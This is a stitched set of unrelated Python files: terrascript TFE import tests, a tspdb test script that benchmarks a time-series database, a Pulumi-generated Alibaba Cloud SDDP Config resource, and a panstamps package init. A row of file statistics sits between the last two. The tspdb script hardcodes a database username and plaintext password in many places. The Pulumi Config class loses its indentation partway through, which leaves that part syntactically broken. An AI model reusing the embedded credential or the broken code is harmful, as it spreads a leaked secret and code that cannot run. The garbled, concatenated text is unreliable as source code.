    from terrascript.resource.hashicorp.tfe import tfe_organization
    from terrascript.resource.hashicorp.tfe import tfe_organization_membership
    from terrascript.resource.hashicorp.tfe import tfe_organization_token
    from terrascript.resource.hashicorp.tfe import tfe_policy_set
    from terrascript.resource.hashicorp.tfe import tfe_policy_set_parameter
    from terrascript.resource.hashicorp.tfe import tfe_registry_module
    from terrascript.resource.hashicorp.tfe import tfe_run_trigger
    from terrascript.resource.hashicorp.tfe import tfe_sentinel_policy
    from terrascript.resource.hashicorp.tfe import tfe_ssh_key
    from terrascript.resource.hashicorp.tfe import tfe_team
    from terrascript.resource.hashicorp.tfe import tfe_team_access
    from terrascript.resource.hashicorp.tfe import tfe_team_member
    from terrascript.resource.hashicorp.tfe import tfe_team_members
    from terrascript.resource.hashicorp.tfe import tfe_team_organization_member
    from terrascript.resource.hashicorp.tfe import tfe_team_token
    from terrascript.resource.hashicorp.tfe import tfe_variable
    from terrascript.resource.hashicorp.tfe import tfe_workspace


def test_datasource_import():
    from terrascript.data.hashicorp.tfe import tfe_agent_pool
    from terrascript.data.hashicorp.tfe import tfe_ip_ranges
    from terrascript.data.hashicorp.tfe import tfe_oauth_client
    from terrascript.data.hashicorp.tfe import tfe_organization
    from terrascript.data.hashicorp.tfe import tfe_organization_membership
    from terrascript.data.hashicorp.tfe import tfe_organizations
    from terrascript.data.hashicorp.tfe import tfe_outputs
    from terrascript.data.hashicorp.tfe import tfe_slug
    from terrascript.data.hashicorp.tfe import tfe_ssh_key
    from terrascript.data.hashicorp.tfe import tfe_team
    from terrascript.data.hashicorp.tfe import tfe_team_access
    from terrascript.data.hashicorp.tfe import tfe_workspace
    from terrascript.data.hashicorp.tfe import tfe_workspace_ids

# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.hashicorp.tfe
#
# t = terrascript.provider.hashicorp.tfe.tfe()
# s = str(t)
#
# assert 'https://github.com/hashicorp/terraform-provider-tfe' in s
# assert '0.26.1' in s

# skgaip/tspdb/tspdb/tests/test.py
import numpy as np
from tspdb.src.database_module.sql_imp import SqlImplementation
from tspdb.src.pindex.predict import get_prediction_range, get_prediction
from tspdb.src.pindex.pindex_managment import TSPI, load_pindex
from tspdb.src.pindex.pindex_utils import index_ts_mapper
import time
interface = SqlImplementation(driver="postgresql", host="localhost", database="querytime_test",user="aalomar",password="AAmit32lids")
import timeit
import pandas as pd
# t = time.time()
# A = load_pindex(interface, 'ts_basic2_pindex')
# print (time.time() - t)
# print(' ')
# t = time.time()
# a = interface.get_time_series('ts_basic2',1,10**6, index_col = 'row_id')
# print (time.time() - t)
# print(' ')


def update_test(init_points=10**4, update_points=[1000, 100, 5000, 10000], T=1000, direct_var=True, index_name='ts_basic_test_pindex'):
    interface = SqlImplementation(driver="postgresql", host="localhost", database="querytime_test", user="aalomar", password="AAmit32lids")
    df = pd.DataFrame(data={'ts': np.arange(init_points).astype('float')})
    interface.create_table('ts_basic_test', df, 'row_id', index_label='row_id')
    time_series_table = ['ts_basic_test', 'ts', 'row_id']
    T0 = 1000
    gamma = 0.5
    k = 2
    k_var = 1
    TSPD = TSPI(_dir='C:/Program Files/PostgreSQL/10/data/', agg_interval=5, T=T, T_var=T, rank=k, rank_var=k_var, col_to_row_ratio=10, index_name=index_name, gamma=gamma, interface=interface, time_series_table=time_series_table, direct_var=direct_var)
    TSPD.create_index()
    interface = SqlImplementation(driver="postgresql", host="localhost", database="querytime_test", user="aalomar", password="AAmit32lids")
    for points in update_points:
        df = pd.DataFrame(data={'ts': np.arange(init_points, points + init_points).astype('float')}, index=np.arange(init_points, points + init_points))
        interface.bulk_insert('ts_basic_test', df, index_label='row_id')
        init_points += points
        print('successfully updated %s points' % points)


def ts_table_tests(init_points=10**4, update_points=[1000, 100, 5000, 10000], T=1000, direct_var=True, index_name='ts_basic_ts_pindex'):
    interface = SqlImplementation(driver="postgresql", host="localhost", database="querytime_test", user="aalomar", password="AAmit32lids")
    df = pd.DataFrame(data={'ts': np.arange(init_points).astype('float')})
    timestamps = pd.date_range('2012-10-01 00:00:00', periods=init_points + 1, freq='5s')
    end = timestamps[-1]
    df.index = timestamps[:-1]
    interface.create_table('ts_basic_ts', df, 'timestamp', index_label='timestamp')
    time_series_table = ['ts_basic_ts', 'ts', 'timestamp']
    T0 = 1000
    gamma = 0.5
    k = 2
    k_var = 1
    TSPD = TSPI(_dir='C:/Program Files/PostgreSQL/10/data/', agg_interval=5, T=T, T_var=T, rank=k, rank_var=k_var, col_to_row_ratio=10, index_name=index_name, gamma=gamma, interface=interface, time_series_table=time_series_table, direct_var=direct_var)
    TSPD.create_index()
    interface = SqlImplementation(driver="postgresql", host="localhost", database="querytime_test", user="aalomar", password="AAmit32lids")
    for points in update_points:
        df = pd.DataFrame(data={'ts': np.arange(init_points, points + init_points).astype('float')})
        timestamps = pd.date_range(end, periods=points + 1, freq='5s')
        end = timestamps[-1]
        df.index = timestamps[:-1]
        interface.bulk_insert('ts_basic_ts', df, index_label='timestamp')
        init_points += points
        print('successfully updated %s points' % points)
# start = pd.to_datetime('2015-01-01 00:00:00')
# end = pd.to_datetime('2018-01-01 00:00:00')
# df = pd.DataFrame(data ={'ts': np.arange(init_points).astype('float')})
# timestamps= pd.DatetimeIndex(1000000000.*(np.random.randint(start.value/10**9,end.value/10**9, init_points)))
# df.index = np.sort(timestamps)
# interface.create_table('ts_basic_ts2', df, 'timestamp', index_label='timestamp')


def create_pindex_test(table_name, T, T_var, k, k_var, direct_var, index_name=None, agg_interval=1., col_to_row_ratio=10, time_column='row_id'):
    interface = SqlImplementation(driver="postgresql", host="localhost", database="querytime_test", user="aalomar", password="AAmit32lids")
    time_series_table = [table_name, 'ts', time_column]
    T0 = 1000
    gamma = 0.5
    TSPD = TSPI(T=T, T_var=T, rank=k, rank_var=k_var, agg_interval=agg_interval, col_to_row_ratio=col_to_row_ratio, index_name=index_name, gamma=gamma, interface=interface, time_series_table=time_series_table, direct_var=direct_var)
    TSPD.create_index()
    print(TSPD.ts_model._denoiseTS()[-10:], TSPD.ts_model.TimeSeriesIndex)


def range_prediction_queries_test(index_name, table_name, max_):
    T1 = [0, 0, max_ - 10, max_ - 15000, max_] + list((max_ + 1000) * np.random.random(10))
    T2 = [10, 10**5, max_ - 1, max_, max_ + 10] + list((max_ + 1000) * np.random.random(10))
    T1 = np.array(T1).astype(int)
    T2 = np.array(T2).astype(int)
    for t1_, t2_ in zip(T1, T2):
        t1, t2 = sorted([t1_, t2_])
        # try:
        get_prediction_range(index_name, table_name, 'ts', 'row_id', interface, int(t1), int(t2), uq=True)
        # except: print('failure to query range between %s and %s' % (t1, t2))


def prediction_queries_test(index_name, table_name, max_):
    T1 = [0, max_ - 10, max_ - 1000, max_ + 1, max_ + 10] + list((max_ + 1000) * np.random.random(50))
    T1 = np.array(T1).astype(int)
    for t1 in T1:
        # try:
        get_prediction(index_name, table_name, 'ts', 'row_id', interface, int(t1), uq=True)
        # except: print('failure to query point %s' % t1)


def prediction_queries_accuracy_test(max_, index_name="tspdb.ts_basic2_pindex2", table_name="ts_basic2"):
    T1 = [100000, max_ - 1000, max_] + list((max_ - 1) * np.random.random(100))
    T1 = np.array(T1).astype(int)
    for t1 in T1:
        print('t = ' + str(t1))
        A, _ = get_prediction(index_name, table_name, 'ts', 'row_id', interface, int(t1))
        print(t1, A)
        assert abs(A - t1) < 1e-3


def range_prediction_queries_accuracy_test(max_, index_name="tspdb.ts_basic2_pindex2", table_name="ts_basic2"):
    T1 = [0, 0, max_ - 10, max_ - 1000] + list((max_ - 1) * np.random.random(10))
    T2 = [10, max_, max_ - 1, max_] + list((max_ - 1) * np.random.random(10))
    T1 = np.array(T1).astype(int)
    T2 = np.array(T2).astype(int)
    for t1_, t2_ in zip(T1, T2):
        t1, t2 = sorted([t1_, t2_])
        A, _ = get_prediction_range(index_name, table_name, 'ts', 'row_id', interface, int(t1), int(t2), uq=True)
        print(t1, t2, np.max(A - np.arange(t1, t2 + 1)))
        print(A)
        assert abs(np.max(A - np.arange(t1, t2 + 1))) < 1e-3


def prediction_queries_latency_test():
    setup = '''import numpy as np
from tspdb.src.database_module.sql_imp import SqlImplementation
from tspdb.src.pindex.predict import get_prediction_range, get_prediction
interface = SqlImplementation(driver="postgresql", host="localhost", database="querytime_test", user="aalomar", password="AAmit32lids")
'''
    stmt1 = "get_prediction('tspdb.ts_5_pindex', 'ts_5', 'ts', 'row_id', interface, 10, False)"
    stmt2 = "get_prediction('tspdb.ts_basic2_pindex', 'ts_basic2', 'ts', 'row_id', interface, 10, False)"
    stmt3 = "get_prediction('tspdb.ts_5_pindex_2', 'ts_5', 'ts', 'row_id', interface, 10, False)"
    stmtA = '''interface.execute_query("select ts from ts_basic2 where row_id = 10") '''
    stmtB = '''interface.execute_query("select ts from ts_5 where row_id = 390") '''
    print('(test1 pindex: ts_5_pindex ) imp query latency is %s that of SELECT ' % (timeit.timeit(setup=setup, stmt=stmt1, number=1000) / timeit.timeit(setup=setup, stmt=stmtB, number=1000)))
    print('(test2 pindex: ts_basic2_pindex ) imp query latency is %s that of SELECT ' % (timeit.timeit(setup=setup, stmt=stmt2, number=1000) / timeit.timeit(setup=setup, stmt=stmtA, number=1000)))
    print('(test3 pindex: ts_5_pindex_2 ) imp query latency is %s that of SELECT ' % (timeit.timeit(setup=setup, stmt=stmt3, number=1000) / timeit.timeit(setup=setup, stmt=stmtB, number=1000)))
    stmt1 = "get_prediction('tspdb.ts_5_pindex', 'ts_5', 'ts', 'row_id', interface, 99997, False)"
    stmt2 = "get_prediction('tspdb.ts_basic2_pindex', 'ts_basic2', 'ts', 'row_id', interface, 999824, False)"
    stmt3 = "get_prediction('tspdb.ts_5_pindex_2', 'ts_5', 'ts', 'row_id', interface, 99970, False)"
    print('(test1 pindex: ts_5_pindex ) Forecast query latency is %s that of SELECT ' % (timeit.timeit(setup=setup, stmt=stmt1, number=1000) / timeit.timeit(setup=setup, stmt=stmtB, number=1000)))
    print('(test2 pindex: ts_basic2_pindex ) Forecast query latency is %s that of SELECT ' % (timeit.timeit(setup=setup, stmt=stmt2, number=1000) / timeit.timeit(setup=setup, stmt=stmtA, number=1000)))
    print('(test3 pindex: ts_5_pindex_2 ) Forecast query latency is %s that of SELECT ' % (timeit.timeit(setup=setup, stmt=stmt3, number=1000) / timeit.timeit(setup=setup, stmt=stmtB, number=1000)))


def main():
    # ts_table_tests()
    # print('test 1')
    update_test()
    print('test 2')
    update_test(init_points=10**4, update_points=[10**4, 100, 1, 100000, 10002], T=10000, index_name='haha')
    # print('test 3')
    # update_test(init_points = 10**4 , update_points = [10**4], T = 1000000, index_name = 'hahddda')
    # print('test 4')
    # update_test(init_points = 10**4 , T = 1000000, direct_var = False, index_name = 'hahaeee')
    # t2 = time.time()
    # create_pindex_test('ts_basic2', 250000,250000, 2 ,1, True, index_name = 'ts_basic2_pindex', time_column = 'row_id',agg_interval = 1 )
    # print ('create pindex test: basic test, time = %s seconds, %s record/s'%(time.time()-t2, (time.time()-t2)/10**6))
    # print('=======================================================')
    # print('SUCCESS')
    # print('=======================================================')
    # t2 = time.time()
    # create_pindex_test('ts_basic2', 30000,30000, 2 ,1, True, index_name = 'ts_basic2_pindex2', time_column = 'row_id',agg_interval = 1 )
    # print ('create pindex test: basic test T = 10000, time = %s seconds, %s record/s'%(time.time()-t2, (time.time()-t2)/10**6))
    # print('=======================================================')
    # print('SUCCESS')
    # print('=======================================================')
    # t2 = time.time()
    # create_pindex_test('ts_5', 9240,9240, 2 ,1, True, index_name = 'ts_5_pindex' )
    # print ('create pindex test: T = 9240, time = %s seconds, %s record/s' %(time.time()-t2, (time.time()-t2)/10**5))
    # print('=======================================================')
    # print('SUCCESS')
    # print('=======================================================')
    # t2 = time.time()
    # create_pindex_test('ts_5', 10000,10000, 2 ,1, False, index_name = 'ts_5_pindex_2' , col_to_row_ratio = 1)
    # print ('create pindex test: non-direct_var, time = %s seconds, %s record/s'%(time.time()-t2, (time.time()-t2)/10**5))
    # print('testing 15 range queries in index ts_basic2_pindex')
    # range_prediction_queries_test('tspdb.ts_basic2_pindex', 'ts_basic2', 10**6)
    # print('=======================================================')
    # print('SUCCESS')
    # print('=======================================================')
    # print('testing 50 point queries in index ts_basic2_pindex')
    # prediction_queries_test('tspdb.ts_basic2_pindex', 'ts_basic2', 10**6)
    # print('=======================================================')
    # print('SUCCESS')
    # print('=======================================================')
    # print('testing 15 range queries in index ts_basic2_pindex2')
    # range_prediction_queries_test('tspdb.ts_basic2_pindex2', 'ts_basic2', 10**6)
    # print('=======================================================')
    # print('SUCCESS')
    # print('=======================================================')
    # print('testing 50 point queries in index ts_basic2_pindex2')
    # prediction_queries_test('tspdb.ts_basic2_pindex2', 'ts_basic2', 10**6)
    # print('=======================================================')
    # print('SUCCESS')
    # print('=======================================================')
    # print('testing 15 range queries in index ts_5_pindex')
    # range_prediction_queries_test('tspdb.ts_5_pindex', 'ts_5', 10**5)
    # print('=======================================================')
    # print('SUCCESS')
    # print('=======================================================')
    # print('testing 50 point queries in index ts_5_pindex')
    # prediction_queries_test('tspdb.ts_5_pindex', 'ts_5', 10**5)
    # print('=======================================================')
    # print('SUCCESS')
    # print('=======================================================')
    # print('testing 15 range queries in index ts_5_pindex_2')
    # range_prediction_queries_test('tspdb.ts_5_pindex_2', 'ts_5', 10**5)
    # print('=======================================================')
    # print('SUCCESS')
    # print('=======================================================')
    # print('testing 50 point queries in index ts_5_pindex_2')
    # prediction_queries_test('tspdb.ts_5_pindex_2', 'ts_5', 10**5)
    # print('=======================================================')
    # print('SUCCESS')
    # prediction_queries_latency_test()
    # print('=======================================================')
    # print('Imputation accuracy Test')
    # range_prediction_queries_accuracy_test(999824)
    # prediction_queries_accuracy_test(999824)
    # print('=======================================================')
    # print('SUCCESS')


main()
# max_ = 99995
# T1 = (max_ * np.random.random(100)).astype(int)
# T2 = (max_ * np.random.random(100)).astype(int)
# for t1_,t2_ in zip(T1,T2):
# t1,t2 = sorted([t1_,t2_])
# print(get_prediction_range('ts_5_pindex', 'ts_5', 'ts', 'row_id', interface, int(t1),int(t2), uq = False))
# get_prediction_range('ts_5_pindex', 'ts_5', 'ts', 'row_id', interface, 1,6, uq = False)
# stmt1 = "get_prediction_range('ts_5_pindex', 'ts_basic2', 'ts', 'row_id', interface, 10,0)"
# timeit.timeit(setup = setup,stmt= stmt1, number =1000)
# stmt = '''interface.engine.execute("select prediction from predict('ts_basic2', 'ts', 'row_id', 10, c=>95, uq => false);")'''
# timeit.timeit(setup = setup,stmt= stmt, number =1000)
# stmt2 = '''interface.engine.execute("select ts from ts_basic2 where row_id = 10") '''
# timeit.timeit(setup = setup,stmt= stmt2, number =1000)
# timeit.timeit(setup = setup,stmt= stmt, number =1000)/timeit.timeit(setup = setup,stmt= stmt2, number =1000)
# stmt = '''interface.engine.execute("select prediction from predict('ts_basic2', 'ts', 'row_id', 1000000, c=>95, uq => false);")'''
# timeit.timeit(setup = setup,stmt= stmt, number =1000)
# timeit.timeit(setup = setup,stmt= stmt, number =1000)/timeit.timeit(setup = setup,stmt= stmt2, number =1000)
# stmt = '''interface.engine.execute("select prediction from predict('ts_basic2', 'ts', 'row_id', 1000000, c=>95, uq => true);")'''
# timeit.timeit(setup = setup,stmt= stmt, number =1000)
# timeit.timeit(setup = setup,stmt= stmt, number =1000)/timeit.timeit(setup = setup,stmt= stmt2, number =1000)
# stmt = '''interface.engine.execute("select prediction from predict('ts_basic2', 'ts', 'row_id', 10, c=>95, uq => true);")'''
# timeit.timeit(setup = setup,stmt= stmt, number =1000)
# timeit.timeit(setup = setup,stmt= stmt, number =1000)/timeit.timeit(setup = setup,stmt= stmt2, number =1000)
# coeff = [i[0] for i in interface.engine.execute('select coeffvalue from ts_5_pindex_c where modelno = 1 order by coeffpos;').fetchall()]
# t = 100000
# ouput = [i[0] for i in interface.engine.execute('select ts from ts_5 where row_id<= 100000-30;').fetchall()]

# sdk/python/pulumi_alicloud/sddp/config.py
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ConfigArgs', 'Config']


@pulumi.input_type
class ConfigArgs:
    def __init__(__self__, *,
                 code: Optional[pulumi.Input[str]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 lang: Optional[pulumi.Input[str]] = None,
                 value: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a Config resource.
        :param pulumi.Input[str] code: Abnormal Alarm General Configuration Module by Using the Encoding. Valid values: `access_failed_cnt`, `access_permission_exprie_max_days`, `log_datasize_avg_days`.
        :param pulumi.Input[str] description: Abnormal Alarm General Description of the Configuration Item.
        :param pulumi.Input[str] value: The Specified Exception Alarm Generic by Using the Value. Code Different Values for This Parameter the Specific Meaning of Different:
               * `access_failed_cnt`: Value Represents the Non-Authorized Resource Repeatedly Attempts to Access the Threshold.
               * `access_permission_exprie_max_days`: Value Represents the Permissions during Periods of Inactivity Exceeding a Threshold.
               * `log_datasize_avg_days`: Value Represents the Date Certain Log Output Is Less than 10 Days before the Average Value of the Threshold.
        """
        if code is not None:
            pulumi.set(__self__, "code", code)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if lang is not None:
            pulumi.set(__self__, "lang", lang)
        if value is not None:
            pulumi.set(__self__, "value", value)

    @property
    @pulumi.getter
    def code(self) -> Optional[pulumi.Input[str]]:
        """
        Abnormal Alarm General Configuration Module by Using the Encoding. Valid values: `access_failed_cnt`, `access_permission_exprie_max_days`, `log_datasize_avg_days`.
        """
        return pulumi.get(self, "code")

    @code.setter
    def code(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "code", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        Abnormal Alarm General Description of the Configuration Item.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def lang(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "lang")

    @lang.setter
    def lang(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "lang", value)

    @property
    @pulumi.getter
    def value(self) -> Optional[pulumi.Input[str]]:
        """
        The Specified Exception Alarm Generic by Using the Value. Code Different Values for This Parameter the Specific Meaning of Different:
        * `access_failed_cnt`: Value Represents the Non-Authorized Resource Repeatedly Attempts to Access the Threshold.
        * `access_permission_exprie_max_days`: Value Represents the Permissions during Periods of Inactivity Exceeding a Threshold.
        * `log_datasize_avg_days`: Value Represents the Date Certain Log Output Is Less than 10 Days before the Average Value of the Threshold.
        """
        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "value", value)


@pulumi.input_type
class _ConfigState:
    def __init__(__self__, *,
                 code: Optional[pulumi.Input[str]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 lang: Optional[pulumi.Input[str]] = None,
                 value: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering Config resources.
        :param pulumi.Input[str] code: Abnormal Alarm General Configuration Module by Using the Encoding. Valid values: `access_failed_cnt`, `access_permission_exprie_max_days`, `log_datasize_avg_days`.
        :param pulumi.Input[str] description: Abnormal Alarm General Description of the Configuration Item.
        :param pulumi.Input[str] value: The Specified Exception Alarm Generic by Using the Value. Code Different Values for This Parameter the Specific Meaning of Different:
               * `access_failed_cnt`: Value Represents the Non-Authorized Resource Repeatedly Attempts to Access the Threshold.
               * `access_permission_exprie_max_days`: Value Represents the Permissions during Periods of Inactivity Exceeding a Threshold.
               * `log_datasize_avg_days`: Value Represents the Date Certain Log Output Is Less than 10 Days before the Average Value of the Threshold.
        """
        if code is not None:
            pulumi.set(__self__, "code", code)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if lang is not None:
            pulumi.set(__self__, "lang", lang)
        if value is not None:
            pulumi.set(__self__, "value", value)

    @property
    @pulumi.getter
    def code(self) -> Optional[pulumi.Input[str]]:
        """
        Abnormal Alarm General Configuration Module by Using the Encoding. Valid values: `access_failed_cnt`, `access_permission_exprie_max_days`, `log_datasize_avg_days`.
        """
        return pulumi.get(self, "code")

    @code.setter
    def code(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "code", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        Abnormal Alarm General Description of the Configuration Item.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def lang(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "lang")

    @lang.setter
    def lang(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "lang", value)

    @property
    @pulumi.getter
    def value(self) -> Optional[pulumi.Input[str]]:
        """
        The Specified Exception Alarm Generic by Using the Value. Code Different Values for This Parameter the Specific Meaning of Different:
        * `access_failed_cnt`: Value Represents the Non-Authorized Resource Repeatedly Attempts to Access the Threshold.
        * `access_permission_exprie_max_days`: Value Represents the Permissions during Periods of Inactivity Exceeding a Threshold.
        * `log_datasize_avg_days`: Value Represents the Date Certain Log Output Is Less than 10 Days before the Average Value of the Threshold.
        """
        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "value", value)
class Config(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
code: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
lang: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a Data Security Center Config resource.
For information about Data Security Center Config and how to use it, see [What is Config](https://help.aliyun.com/product/88674.html).
> **NOTE:** Available in v1.133.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
default = alicloud.sddp.Config("default",
code="access_failed_cnt",
value="10")
```
## Import
Data Security Center Config can be imported using the id, e.g.
```sh
$ pulumi import alicloud:sddp/config:Config example <code>
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] code: Abnormal Alarm General Configuration Module by Using the Encoding. Valid values: `access_failed_cnt`, `access_permission_exprie_max_days`, `log_datasize_avg_days`.
:param pulumi.Input[str] description: Abnormal Alarm General Description of the Configuration Item.
:param pulumi.Input[str] value: The Specified Exception Alarm Generic by Using the Value. Code Different Values for This Parameter the Specific Meaning of Different:
* `access_failed_cnt`: Value Represents the Non-Authorized Resource Repeatedly Attempts to Access the Threshold.
* `access_permission_exprie_max_days`: Value Represents the Permissions during Periods of Inactivity Exceeding a Threshold.
* `log_datasize_avg_days`: Value Represents the Date Certain Log Output Is Less than 10 Days before the Average Value of the Threshold.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[ConfigArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Data Security Center Config resource.
For information about Data Security Center Config and how to use it, see [What is Config](https://help.aliyun.com/product/88674.html).
> **NOTE:** Available in v1.133.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
default = alicloud.sddp.Config("default",
code="access_failed_cnt",
value="10")
```
## Import
Data Security Center Config can be imported using the id, e.g.
```sh
$ pulumi import alicloud:sddp/config:Config example <code>
```
:param str resource_name: The name of the resource.
:param ConfigArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ConfigArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
code: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
lang: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ConfigArgs.__new__(ConfigArgs)
__props__.__dict__["code"] = code
__props__.__dict__["description"] = description
__props__.__dict__["lang"] = lang
__props__.__dict__["value"] = value
super(Config, __self__).__init__(
'alicloud:sddp/config:Config',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
code: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
lang: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None) -> 'Config':
"""
Get an existing Config resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] code: The code of the abnormal alarm general configuration module. Valid values: `access_failed_cnt`, `access_permission_exprie_max_days`, `log_datasize_avg_days`.
:param pulumi.Input[str] description: The description of the abnormal alarm general configuration item.
:param pulumi.Input[str] value: The value of the abnormal alarm configuration item. Its meaning depends on `code`:
* `access_failed_cnt`: the threshold for repeated access attempts to a resource without authorization.
* `access_permission_exprie_max_days`: the threshold for the number of days a permission may remain unused.
* `log_datasize_avg_days`: the threshold for the average log output over the preceding 10 days.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ConfigState.__new__(_ConfigState)
__props__.__dict__["code"] = code
__props__.__dict__["description"] = description
__props__.__dict__["lang"] = lang
__props__.__dict__["value"] = value
return Config(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def code(self) -> pulumi.Output[Optional[str]]:
"""
The code of the abnormal alarm general configuration module. Valid values: `access_failed_cnt`, `access_permission_exprie_max_days`, `log_datasize_avg_days`.
"""
return pulumi.get(self, "code")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
The description of the abnormal alarm general configuration item.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def lang(self) -> pulumi.Output[Optional[str]]:
"""
The language of the request and response (assumed to follow the usual alicloud convention; valid values: `zh`, `en`).
"""
return pulumi.get(self, "lang")
@property
@pulumi.getter
def value(self) -> pulumi.Output[Optional[str]]:
"""
The value of the abnormal alarm configuration item. Its meaning depends on `code`:
* `access_failed_cnt`: the threshold for repeated access attempts to a resource without authorization.
* `access_permission_exprie_max_days`: the threshold for the number of days a permission may remain unused.
* `log_datasize_avg_days`: the threshold for the average log output over the preceding 10 days.
"""
return pulumi.get(self, "value")
| 45.688761 | 202 | 0.660969 | 1,884 | 15,854 | 5.364119 | 0.105626 | 0.0566 | 0.069266 | 0.078369 | 0.855136 | 0.835444 | 0.81981 | 0.811993 | 0.806946 | 0.806946 | 0 | 0.003281 | 0.250284 | 15,854 | 346 | 203 | 45.820809 | 0.846963 | 0.484168 | 0 | 0.745665 | 1 | 0 | 0.058127 | 0.003719 | 0 | 0 | 0 | 0 | 0 | 1 | 0.156069 | false | 0.00578 | 0.028902 | 0.017341 | 0.277457 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
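Both the constructor and `get` in the generated resource above allocate the props object with `__new__` and then write fields straight into `__dict__`, never running `__init__`. A minimal standalone sketch of that allocation pattern (the `_ConfigState` class here is illustrative, not Pulumi's):

```python
class _ConfigState:
    """Stand-in for a generated state class; fields are set after allocation."""

    def __init__(self):
        # The generated code never runs this: it allocates via __new__
        # and fills __dict__ directly.
        raise RuntimeError("allocate with __new__, not the constructor")


# Allocate without invoking __init__, then populate attributes directly,
# mirroring `__props__ = _ConfigState.__new__(_ConfigState)` above.
props = _ConfigState.__new__(_ConfigState)
props.__dict__["code"] = "access_failed_cnt"
props.__dict__["description"] = "example config"
```

Attribute lookup falls through to the instance `__dict__`, so `props.code` reads back the stored value even though no constructor ever ran.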
e7e3022441510476c354d59e76340450bc6d43ed | 183 | py | Python | panstamps/__init__.py | djones1040/panstamps | b9e67b4dc168846ddb36e4b5f143c136660a0535 | [
"MIT"
] | null | null | null | panstamps/__init__.py | djones1040/panstamps | b9e67b4dc168846ddb36e4b5f143c136660a0535 | [
"MIT"
] | null | null | null | panstamps/__init__.py | djones1040/panstamps | b9e67b4dc168846ddb36e4b5f143c136660a0535 | [
"MIT"
] | null | null | null | from panstamps.__version__ import __version__
from panstamps import utKit
from panstamps import cl_utils
from panstamps.downloader import downloader
from panstamps.image import image
